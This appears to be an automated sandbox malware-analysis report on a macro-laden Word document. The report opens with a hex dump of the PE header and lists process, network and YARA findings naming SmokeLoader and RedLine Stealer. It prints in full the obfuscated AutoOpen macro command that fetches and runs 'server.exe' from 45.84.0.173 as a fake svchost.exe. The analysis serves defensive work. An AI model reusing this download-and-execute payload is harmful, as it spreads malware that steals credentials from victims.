ec 45 2c 3f eb 45 2d 3f 86 45 2c 3f f5 17 a6 3f ea 45 2c 3f f5 17 b8 3f ea 45 2c 3f f5 17 bd 3f ea 45 2c 3f 52 69 63 68 eb 45 2c 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 98 09 4a 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 90 00 00 00 2c f4 01 00 00 00 00 f7 15 00 00 00 10 00 00 00 a0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 90 f4 01 00 04 00 00 c9 24 03 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8c 01 02 00 50 00 00 00 00 e0 f3 01 d0 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 00 00 84 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b6 8f 00 00 00 10 00 00 00 90 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 66 6a 01 00 00 a0 00 00 00 6c 01 00 00 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 5c c6 f1 01 00 10 02 00 00 2e 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d0 a0 00 00 00 e0 f3 01 00 a2 00 00 00 2e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Source: global trafficHTTP traffic detected: GET /download_22/server.exe HTTP/1.1Host: 45.84.0.173Connection: Keep-Alive
        Source: unknownTCP traffic detected without corresponding DNS query: 45.84.0.173
        Source: unknownTCP traffic detected without corresponding DNS query: 45.84.0.173
        Source: unknownTCP traffic detected without corresponding DNS query: 45.84.0.173
        Source: unknownTCP traffic detected without corresponding DNS query: 45.84.0.173
        Source: unknownTCP traffic detected without corresponding DNS query: 45.84.0.173
        Source: unknownTCP traffic detected without corresponding DNS query: 45.84.0.173
        Source: unknownTCP traffic detected without corresponding DNS query: 45.84.0.173
        Source: unknownTCP traffic detected without corresponding DNS query: 45.84.0.173
        Source: unknownTCP traffic detected without corresponding DNS query: 45.84.0.173
        Source: unknownTCP traffic detected without corresponding DNS query: 45.84.0.173
        Source: unknownTCP traffic detected without corresponding DNS query: 45.84.0.173
        Source: unknownTCP traffic detected without corresponding DNS query: 45.84.0.173
        Source: unknownTCP traffic detected without corresponding DNS query: 45.84.0.173
        Source: unknownTCP traffic detected without corresponding DNS query: 45.84.0.173
        Source: unknownTCP traffic detected without corresponding DNS query: 45.84.0.173
        Source: unknownTCP traffic detected without corresponding DNS query: 45.84.0.173
        Source: unknownTCP traffic detected without corresponding DNS query: 45.84.0.173
        Source: unknownTCP traffic detected without corresponding DNS query: 45.84.0.173
        Source: unknownTCP traffic detected without corresponding DNS query: 45.84.0.173
        Source: unknownTCP traffic detected without corresponding DNS query: 45.84.0.173
        Source: unknownTCP traffic detected without corresponding DNS query: 45.84.0.173
        Source: unknownTCP traffic detected without corresponding DNS query: 45.84.0.173
        Source: unknownTCP traffic detected without corresponding DNS query: 45.84.0.173
        Source: unknownTCP traffic detected without corresponding DNS query: 45.84.0.173
        Source: unknownTCP traffic detected without corresponding DNS query: 45.84.0.173
        Source: unknownTCP traffic detected without corresponding DNS query: 45.84.0.173
        Source: unknownTCP traffic detected without corresponding DNS query: 45.84.0.173
        Source: unknownTCP traffic detected without corresponding DNS query: 45.84.0.173
        Source: unknownTCP traffic detected without corresponding DNS query: 45.84.0.173
        Source: unknownTCP traffic detected without corresponding DNS query: 45.84.0.173
        Source: unknownTCP traffic detected without corresponding DNS query: 45.84.0.173
        Source: unknownTCP traffic detected without corresponding DNS query: 45.84.0.173
        Source: unknownTCP traffic detected without corresponding DNS query: 45.84.0.173
        Source: unknownTCP traffic detected without corresponding DNS query: 45.84.0.173
        Source: unknownTCP traffic detected without corresponding DNS query: 45.84.0.173
        Source: unknownTCP traffic detected without corresponding DNS query: 45.84.0.173
        Source: unknownTCP traffic detected without corresponding DNS query: 45.84.0.173
        Source: unknownTCP traffic detected without corresponding DNS query: 45.84.0.173
        Source: unknownTCP traffic detected without corresponding DNS query: 45.84.0.173
        Source: unknownTCP traffic detected without corresponding DNS query: 45.84.0.173
        Source: unknownTCP traffic detected without corresponding DNS query: 45.84.0.173
        Source: unknownTCP traffic detected without corresponding DNS query: 45.84.0.173
        Source: unknownTCP traffic detected without corresponding DNS query: 45.84.0.173
        Source: unknownTCP traffic detected without corresponding DNS query: 45.84.0.173
        Source: unknownTCP traffic detected without corresponding DNS query: 45.84.0.173
        Source: unknownTCP traffic detected without corresponding DNS query: 45.84.0.173
        Source: unknownTCP traffic detected without corresponding DNS query: 45.84.0.173
        Source: unknownTCP traffic detected without corresponding DNS query: 45.84.0.173
        Source: unknownTCP traffic detected without corresponding DNS query: 45.84.0.173
        Source: unknownTCP traffic detected without corresponding DNS query: 45.84.0.173
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{89AD645A-9CDB-46AF-ADC6-EB1F41B38A0D}.tmpJump to behavior
        Source: global trafficHTTP traffic detected: GET /download_22/server.exe HTTP/1.1Host: 45.84.0.173Connection: Keep-Alive
        Source: powershell.exe, 00000006.00000002.358011203.0000000002936000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.358011203.0000000002929000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.84.0.173
        Source: powershell.exe, 00000005.00000002.362102423.0000000002960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.358011203.0000000002531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.357966848.0000000002397000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.358011203.0000000002731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.84.0.173/download_22/server.exe
        Source: powershell.exe, 00000006.00000002.357966848.000000000247E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.cr
        Source: powershell.exe, 00000006.00000002.358011203.00000000038BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
        Source: powershell.exe, 00000006.00000002.360116556.0000000012561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000005.00000002.362102423.0000000002451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.358011203.0000000002531000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000006.00000002.360116556.0000000012561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000006.00000002.360116556.0000000012561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000006.00000002.360116556.0000000012561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: powershell.exe, 00000006.00000002.360116556.0000000012561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

        Key, Mouse, Clipboard, Microphone and Screen Capturing

        barindex
        Yara detected SmokeLoader
        Source: Yara matchFile source: 7.2.svchost.exe.220e67.0.raw.unpack, type: UNPACKEDPE

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 00000007.00000002.357457771.0000000000220000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
        Source: 00000007.00000002.357823146.0000000002449000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
        Source: Process Memory Space: powershell.exe PID: 1432, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Document contains an embedded VBA macro which may execute processes
        Source: 472.rtf.docOLE, VBA macro line: Program = Shell(cmdStr, vbHide)
        Source: ~DFF8D2936508DC487F.TMP.0.drOLE, VBA macro line: JbxHook_Shell_2_ = Shell(jbxparam0, jbxparam1)
        Document contains an embedded VBA macro with suspicious strings
        Source: 472.rtf.docOLE, VBA macro line: cmdStr = "cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;"
        Source: VBA code instrumentationOLE, VBA macro: Module NewMacros, Function AutoOpen, String powershell: cmdStr = "cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;"Name: AutoOpen
        Source: ~DFF8D2936508DC487F.TMP.0.drOLE, VBA macro line: cmdStr = "cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;"
        Powershell drops PE file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\svchost.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_000007FE898B00DD6_2_000007FE898B00DD
        Source: 472.rtf.docOLE, VBA macro line: Sub AutoOpen()
        Source: VBA code instrumentationOLE, VBA macro: Module NewMacros, Function AutoOpenName: AutoOpen
        Source: ~DFF8D2936508DC487F.TMP.0.drOLE, VBA macro line: Sub AutoOpen()
        Source: 472.rtf.docOLE indicator, VBA macros: true
        Source: ~DFF8D2936508DC487F.TMP.0.drOLE indicator, VBA macros: true
        Source: ~WRF{91706ACD-1867-4224-BC67-02D7D9560855}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
        Source: ~DFF8D2936508DC487F.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
        Source: 00000007.00000002.357457771.0000000000220000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
        Source: 00000007.00000002.357823146.0000000002449000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
        Source: Process Memory Space: powershell.exe PID: 1432, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@11/17@0/1
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 7_2_0244BF0B CreateToolhelp32Snapshot,Module32First,7_2_0244BF0B
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$72.rtf.docJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR63D1.tmpJump to behavior
        Source: 472.rtf.docOLE indicator, Word Document stream: true
        Source: 472.rtf.docOLE document summary: title field not present or empty
        Source: ~WRF{91706ACD-1867-4224-BC67-02D7D9560855}.tmp.0.drOLE document summary: title field not present or empty
        Source: ~WRF{91706ACD-1867-4224-BC67-02D7D9560855}.tmp.0.drOLE document summary: author field not present or empty
        Source: ~WRF{91706ACD-1867-4224-BC67-02D7D9560855}.tmp.0.drOLE document summary: edited time not present or 0
        Source: ~DFF8D2936508DC487F.TMP.0.drOLE document summary: title field not present or empty
        Source: ~DFF8D2936508DC487F.TMP.0.drOLE document summary: author field not present or empty
        Source: ~DFF8D2936508DC487F.TMP.0.drOLE document summary: edited time not present or 0
        Source: C:\Windows\System32\timeout.exeConsole Write: ................D.................W.a.i.t.i.n.g. .f.o.r. .3......................................................................d(.............Jump to behavior
        Source: C:\Windows\System32\timeout.exeConsole Write: ................D............... .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. .....................J........d(.......(.....Jump to behavior
        Source: C:\Windows\System32\timeout.exeConsole Write: ................,.................2.............,. .p.r.........................................................................................Jump to behavior
        Source: C:\Windows\System32\timeout.exeConsole Write: ................D.................1.............,. .p.r.........................................................................................Jump to behavior
        Source: C:\Windows\System32\timeout.exeConsole Write: ................p.................0.............,. .p.r.........................................................................................Jump to behavior
        Source: C:\Windows\System32\timeout.exeConsole Write: ................d...............................,. .p.r.........................................................................................Jump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Windows\System32\timeout.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: 472.rtf.docReversingLabs: Detection: 26%
        Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 3
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JABXAGUAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAFUAcgBsACAAPQAgACcAaAB0AHQAcAA6AC8ALwA0ADUALgA4ADQALgAwAC4AMQA3ADMALwBkAG8AdwBuAGwAbwBhAGQAXwAyADIALwBzAGUAcgB2AGUAcgAuAGUAeABlACcAOwAgACQAUAB0AGgAIAA9ACAAIgAkAGUAbgB2ADoAVABlAG0AcABcAHMAdgBjAGgAbwBzAHQALgBlAHgAZQAiADsAIAAkAFcAZQBiAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAFUAcgBsACwAIAAkAFAAdABoACkAOwAgAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAUAB0AGgAOwA=
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\svchost.exe "C:\Users\user\AppData\Local\Temp\svchost.exe"
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 3Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JABXAGUAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAFUAcgBsACAAPQAgACcAaAB0AHQAcAA6AC8ALwA0ADUALgA4ADQALgAwAC4AMQA3ADMALwBkAG8AdwBuAGwAbwBhAGQAXwAyADIALwBzAGUAcgB2AGUAcgAuAGUAeABlACcAOwAgACQAUAB0AGgAIAA9ACAAIgAkAGUAbgB2ADoAVABlAG0AcABcAHMAdgBjAGgAbwBzAHQALgBlAHgAZQAiADsAIAAkAFcAZQBiAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAFUAcgBsACwAIAAkAFAAdABoACkAOwAgAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAUAB0AGgAOwA=Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\svchost.exe "C:\Users\user\AppData\Local\Temp\svchost.exe"Jump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dllJump to behavior
        Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: wow64win.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: wow64cpu.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: msimg32.dllJump to behavior
        Source: 472.rtf.LNK.0.drLNK file: ..\..\..\..\..\Desktop\ 472.rtf.doc
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: 472.rtf.docInitial sample: OLE zip file path = docProps/custom.xml
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
        Source: ~WRF{91706ACD-1867-4224-BC67-02D7D9560855}.tmp.0.drInitial sample: OLE indicators vbamacros = False

        Data Obfuscation

        barindex
        Suspicious command line found
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;Jump to behavior
        Suspicious powershell command line found
